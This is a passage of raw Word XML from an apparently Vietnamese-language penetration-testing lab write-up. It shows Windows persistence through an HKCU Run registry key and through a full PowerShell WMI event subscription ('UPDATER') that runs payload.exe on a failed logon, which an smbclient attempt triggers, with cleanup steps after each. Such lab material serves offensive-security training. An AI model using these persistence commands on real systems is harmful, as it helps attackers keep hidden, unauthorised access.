        <w:t>mang lại cho chúng tôi mức độ truy cập cao với cơ chế lưu giữ lâu dài này. Hãy dọn dẹp trên Windows bằng cách tắt và xóa dịch vụ. Chuyển sang CMD nâng cao của bạn trên Windows và hủy tiến trình và dịch vụ bằng các lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFD74AF" w14:textId="1A525190" w:rsidR="00D05593" w:rsidRDefault="00D05593" w:rsidP="00C41407">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="630FBB74" wp14:editId="6D974F8B">
            <wp:extent cx="5562600" cy="2543175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="37823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35072" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5562600" cy="2543175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2313B0A9" w14:textId="60553CA9" w:rsidR="00D05593" w:rsidRDefault="00D05593" w:rsidP="00D05593">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:t>HKCU Run Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C15C833" w14:textId="5A3CFF86" w:rsidR="00D05593" w:rsidRDefault="00D05593" w:rsidP="00D05593">
      <w:r>
        <w:t>Mở cmd bình thường và chạy lệnh sau để tạo registry key cho user hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D72A2E6" w14:textId="7EC8D805" w:rsidR="00D05593" w:rsidRDefault="00D05593" w:rsidP="00D05593">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A143312" wp14:editId="32680E46">
            <wp:extent cx="6858000" cy="582295"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="3046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989" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="582295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B13CB1" w14:textId="77777777" w:rsidR="00D05593" w:rsidRDefault="00D05593" w:rsidP="00D05593">
      <w:r w:rsidRPr="002448BD">
        <w:t xml:space="preserve">Các tùy chọn cho lệnh là: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177221F4" w14:textId="77777777" w:rsidR="00D05593" w:rsidRDefault="00D05593" w:rsidP="00D05593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002448BD">
        <w:t xml:space="preserve">reg - lệnh chạy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108D4457" w14:textId="77777777" w:rsidR="00D05593" w:rsidRDefault="00D05593" w:rsidP="00D05593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002448BD">
        <w:t xml:space="preserve">add - thêm khóa </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16838803" w14:textId="77777777" w:rsidR="00D05593" w:rsidRDefault="00D05593" w:rsidP="00D05593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002448BD">
        <w:t xml:space="preserve">"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" - vị trí để thêm khóa </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F059CBA" w14:textId="77777777" w:rsidR="00D05593" w:rsidRDefault="00D05593" w:rsidP="00D05593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002448BD">
        <w:t xml:space="preserve">/V "User Persist" - tên của khóa ( Giá trị) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255A69E8" w14:textId="77777777" w:rsidR="00D05593" w:rsidRDefault="00D05593" w:rsidP="00D05593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002448BD">
        <w:t xml:space="preserve">/t REG_SZ - gõ Chuỗi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189DB70F" w14:textId="77777777" w:rsidR="00D05593" w:rsidRDefault="00D05593" w:rsidP="00D05593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002448BD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">/F - bắt buộc, ghi đè nếu nó tồn tại </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758482C1" w14:textId="77777777" w:rsidR="00D05593" w:rsidRDefault="00D05593" w:rsidP="00D05593">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002448BD">
        <w:t xml:space="preserve">/D "C:\Users\sec560\Desktop\payload.exe" - dữ liệu, tệp thực thi để chạy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB34233" w14:textId="4B70D5C4" w:rsidR="00D05593" w:rsidRDefault="00C72C72" w:rsidP="00D05593">
      <w:r>
        <w:t>Đ</w:t>
      </w:r>
      <w:r w:rsidRPr="002448BD">
        <w:t>ăng xuất khỏi Windows và đăng nhập lại với tư cách người dùng sec560. Khi đăng nhập lại bạn sẽ thấy một phiên mới trong Sliver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F7E409" w14:textId="06DD72F6" w:rsidR="00C72C72" w:rsidRDefault="00C72C72" w:rsidP="00D05593">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="788FF6CB" wp14:editId="7BF7EB99">
            <wp:extent cx="6858000" cy="1138555"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="10920590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907" name="Picture 1" descr="A close-up of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1138555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="013039E4" w14:textId="485B6587" w:rsidR="00C72C72" w:rsidRDefault="00C72C72" w:rsidP="00D05593">
      <w:r>
        <w:t>Tương tự, tương tác với phiên và kiểm tra quyền truy cập hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267419CA" w14:textId="6DB480A0" w:rsidR="00D05593" w:rsidRDefault="00C72C72" w:rsidP="00D05593">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40B765CC" wp14:editId="56C91DB2">
            <wp:extent cx="3810000" cy="1590675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="133428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8565" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3810000" cy="1590675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B647AC6" w14:textId="62F4E49D" w:rsidR="00C72C72" w:rsidRDefault="00C72C72" w:rsidP="00D05593">
      <w:r>
        <w:t>Dọn dẹp và loại bỏ key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAFDF78" w14:textId="6BECF657" w:rsidR="00C72C72" w:rsidRDefault="00C72C72" w:rsidP="00D05593">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CB34FD4" wp14:editId="060A6B56">
            <wp:extent cx="6515100" cy="647700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="124545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5360" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6515100" cy="647700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="641D8C6F" w14:textId="77777777" w:rsidR="00C72C72" w:rsidRDefault="00C72C72" w:rsidP="00C72C72">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C477C1">
        <w:t xml:space="preserve">Các tùy chọn cho lệnh là: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA16AD2" w14:textId="77777777" w:rsidR="00C72C72" w:rsidRDefault="00C72C72" w:rsidP="00C72C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00C477C1">
        <w:t xml:space="preserve">reg - lệnh chạy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378BD4BA" w14:textId="77777777" w:rsidR="00C72C72" w:rsidRDefault="00C72C72" w:rsidP="00C72C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r w:rsidRPr="00C477C1">
        <w:t xml:space="preserve"> - xóa khóa </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6CC6A1" w14:textId="77777777" w:rsidR="00C72C72" w:rsidRDefault="00C72C72" w:rsidP="00C72C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00C477C1">
        <w:t xml:space="preserve">"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" - vị trí thêm khóa </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0CC6EA" w14:textId="77777777" w:rsidR="00C72C72" w:rsidRDefault="00C72C72" w:rsidP="00C72C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00C477C1">
        <w:t>/V "User Persist" - tên của khóa ( Giá trị)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436711AA" w14:textId="4C275CF2" w:rsidR="00C72C72" w:rsidRDefault="00C72C72" w:rsidP="00C72C72">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
      </w:pPr>
      <w:r>
        <w:t>WMI Event Filter Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44303E75" w14:textId="61AF1980" w:rsidR="001D2DC9" w:rsidRDefault="001D2DC9" w:rsidP="00C72C72">
      <w:r w:rsidRPr="001D2DC9">
        <w:t>WMI cho phép quản trị viên hệ thống và phần mềm thực hiện các thao tác quản lý, giám sát, và tương tác với các thành phần của hệ thống Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437EC129" w14:textId="37229162" w:rsidR="00C72C72" w:rsidRDefault="00C72C72" w:rsidP="00C72C72">
      <w:r>
        <w:t>Ta</w:t>
      </w:r>
      <w:r w:rsidRPr="00447796">
        <w:t xml:space="preserve"> sẽ thiết lập trình xử lý sự kiện cho lần đăng nhập không thành công (ID sự kiện 4625) cho người dùng fakeuser . Điều này sẽ cho phép </w:t>
      </w:r>
      <w:r>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="00447796">
        <w:t xml:space="preserve"> kích hoạt </w:t>
      </w:r>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00447796">
        <w:t xml:space="preserve"> của mình khi đăng nhập thất bại đối với người dùng không tồn tại! Chúng tôi sẽ sử dụng các lệnh PowerShell bên dưới để thiết lập bộ lọc.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sử dụng powershell với quyền admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A031CAA" w14:textId="77777777" w:rsidR="00C72C72" w:rsidRDefault="00C72C72" w:rsidP="00C72C72">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00546AE2">
        <w:t xml:space="preserve">Có ba phần để thiết lập. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646F9207" w14:textId="77777777" w:rsidR="00C72C72" w:rsidRDefault="00C72C72" w:rsidP="00C72C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00546AE2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Lệnh đầu tiên chúng ta sẽ sử dụng sẽ thiết lập Bộ lọc sự kiện -Class __EventFilter với tên UPDATER. Sau đó, truy vấn sẽ tìm kiếm thông tin đăng nhập không thành công (ID sự kiện 4625 ) trong đó thông tin đăng nhập khớp với fakeuser . </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27420284" w14:textId="784C53E3" w:rsidR="00C72C72" w:rsidRDefault="00C72C72" w:rsidP="00C72C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00546AE2">
        <w:t xml:space="preserve">Phần thứ hai thiết </w:t>
      </w:r>
      <w:r w:rsidR="00925B92">
        <w:t>consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00546AE2">
        <w:t xml:space="preserve"> phải làm gì khi </w:t>
      </w:r>
      <w:r w:rsidR="00925B92">
        <w:t>khớp filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00546AE2">
        <w:t xml:space="preserve">. Trong trường hợp này, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ta </w:t>
      </w:r>
      <w:r w:rsidRPr="00546AE2">
        <w:t>sẽ khớp với bộ lọc UPDATER chạ</w:t>
      </w:r>
      <w:r>
        <w:t>y payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00546AE2">
        <w:t xml:space="preserve"> tại C:\Users\sec560\Desktop\payload.exe . </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6751FA" w14:textId="5AAC21B9" w:rsidR="00C72C72" w:rsidRDefault="00C72C72" w:rsidP="00C72C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00546AE2">
        <w:t>Phần cuối cùng thiết lập liên kết</w:t>
      </w:r>
      <w:r w:rsidR="00925B92">
        <w:t xml:space="preserve"> filter với cosumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00546AE2">
        <w:t xml:space="preserve"> để </w:t>
      </w:r>
      <w:r w:rsidR="00925B92">
        <w:t>kích hoạt</w:t>
      </w:r>
      <w:r w:rsidRPr="00546AE2">
        <w:t xml:space="preserve"> và chạy ứng dụng </w:t>
      </w:r>
      <w:r>
        <w:t>consumer (payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00546AE2">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D73B7A" w14:textId="77777777" w:rsidR="00555E61" w:rsidRDefault="00555E61" w:rsidP="00555E61">
      <w:r>
        <w:t>$filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = "UPDATER"; Query = "SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND Targetinstance.EventCode = '4625' And Targetinstance.Message Like '%fakeuser%'"; QueryLanguage = 'WQL'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050241C6" w14:textId="77777777" w:rsidR="001D2DC9" w:rsidRDefault="001D2DC9" w:rsidP="001D2DC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D2DC9">
        <w:t xml:space="preserve">Tạo một bộ lọc sự kiện WMI trong namespace root/subscription và lớp __EventFilter. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59630A37" w14:textId="77777777" w:rsidR="001D2DC9" w:rsidRDefault="001D2DC9" w:rsidP="001D2DC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D2DC9">
        <w:t>Bộ lọc này được đặt tên là "UPDATER". Thực hiện một truy vấn WQL (WMI Query Language) để lắng nghe sự kiện tạo ra (__InstanceCreationEvent) trong vòng 60 giây. Sự kiện này phải thuộc namespace root/cimv2 và có mã sự kiện là '4625' (mã lỗi đăng nhập không thành công).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A854E9B" w14:textId="478BB5C6" w:rsidR="001D2DC9" w:rsidRDefault="001D2DC9" w:rsidP="001D2DC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D2DC9">
        <w:t xml:space="preserve"> Thêm điều kiện là sự kiện phải chứa chuỗi "fakeuser" trong thông điệp. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A115E5D" w14:textId="77777777" w:rsidR="00555E61" w:rsidRDefault="00555E61" w:rsidP="00555E61">
      <w:r>
        <w:t>$consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = "UPDATER"; CommandLineTemplate = "C:\Users\sec560\Desktop\payload.exe"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2C456A" w14:textId="3A952C4F" w:rsidR="001D2DC9" w:rsidRDefault="001D2DC9" w:rsidP="001D2DC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D2DC9">
        <w:t xml:space="preserve">Tạo một </w:t>
      </w:r>
      <w:r>
        <w:t>consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="001D2DC9">
        <w:t xml:space="preserve"> WMI trong namespace root/subscription và lớp CommandLineEventConsumer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361D586A" w14:textId="325E9D49" w:rsidR="001D2DC9" w:rsidRDefault="001D2DC9" w:rsidP="001D2DC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="001D2DC9">
        <w:t xml:space="preserve"> này cũng được đặt tên là "UPDATER". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7663D5" w14:textId="0C6FBFCA" w:rsidR="001D2DC9" w:rsidRDefault="001D2DC9" w:rsidP="001D2DC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D2DC9">
        <w:t>Thực thi một tệp thực thi (payload.exe) có đường dẫn là C:\Users\sec560\Desktop\payload.exe mỗi khi sự kiện kích hoạt bộ lọc xảy ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5670A1D5" w14:textId="31653091" w:rsidR="00555E61" w:rsidRDefault="00555E61" w:rsidP="00555E61">
      <w:r>
        <w:t>$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B36DFCE" w14:textId="36E38856" w:rsidR="00C72C72" w:rsidRDefault="00555E61" w:rsidP="00C72C72">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51F20E01" wp14:editId="52A769C0">
            <wp:extent cx="6858000" cy="907415"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="874247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707" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="907415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63660653" w14:textId="0EA99B74" w:rsidR="00555E61" w:rsidRDefault="00555E61" w:rsidP="00C72C72">
      <w:r w:rsidRPr="00CC09FA">
        <w:t>chuyển sang Linux, mở một thiết bị đầu cuối mới và thử đăng nhập bằng smbclient và fakeuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2336BD38" w14:textId="3D0B7E7C" w:rsidR="00555E61" w:rsidRDefault="00555E61" w:rsidP="00C72C72">
      <w:r>
        <w:t>smbclient '\\10.130.10.25\c$' -U fakeuser fakepass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F3587D" w14:textId="2648BC6A" w:rsidR="00555E61" w:rsidRDefault="00555E61" w:rsidP="00C72C72">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F70E521" wp14:editId="39130CCA">
            <wp:extent cx="6181725" cy="581025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="11626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9473" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6181725" cy="581025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C91E4" w14:textId="7161F2D7" w:rsidR="00555E61" w:rsidRDefault="00555E61" w:rsidP="00C72C72">
      <w:r>
        <w:t xml:space="preserve">Chờ một lúc, ta sẽ thấy session được mở </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11702497" w14:textId="6A312C38" w:rsidR="00555E61" w:rsidRDefault="00555E61" w:rsidP="00C72C72">
      <w:r>
        <w:t>Tương tự, ta kiểm tra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D97F1E9" w14:textId="1B6DBA67" w:rsidR="00555E61" w:rsidRDefault="00555E61" w:rsidP="00C72C72">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B94CD3E" wp14:editId="1B243DC1">
            <wp:extent cx="6858000" cy="1871345"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="67960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2914" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1871345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DAA038" w14:textId="173489BB" w:rsidR="00555E61" w:rsidRDefault="00555E61" w:rsidP="00C72C72">
      <w:r>
        <w:t>Dọn dẹp bộ lọc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412EE0DD" w14:textId="3996F93D" w:rsidR="00555E61" w:rsidRDefault="00555E61" w:rsidP="00C72C72">
      <w:r w:rsidRPr="00C633AE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FE4643C" wp14:editId="779ABAEC">
            <wp:extent cx="6940132" cy="6191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42428" cy="619330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43282510" w14:textId="157BB895" w:rsidR="003F61CF" w:rsidRDefault="003F61CF" w:rsidP="003F61CF">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Kết luận</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7322C6E6" w14:textId="77777777" w:rsidR="003F61CF" w:rsidRDefault="003F61CF" w:rsidP="003F61CF">
      <w:r w:rsidRPr="003F61CF">
        <w:t xml:space="preserve">Chúng </w:t>
      </w:r>
      <w:r>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="003F61CF">
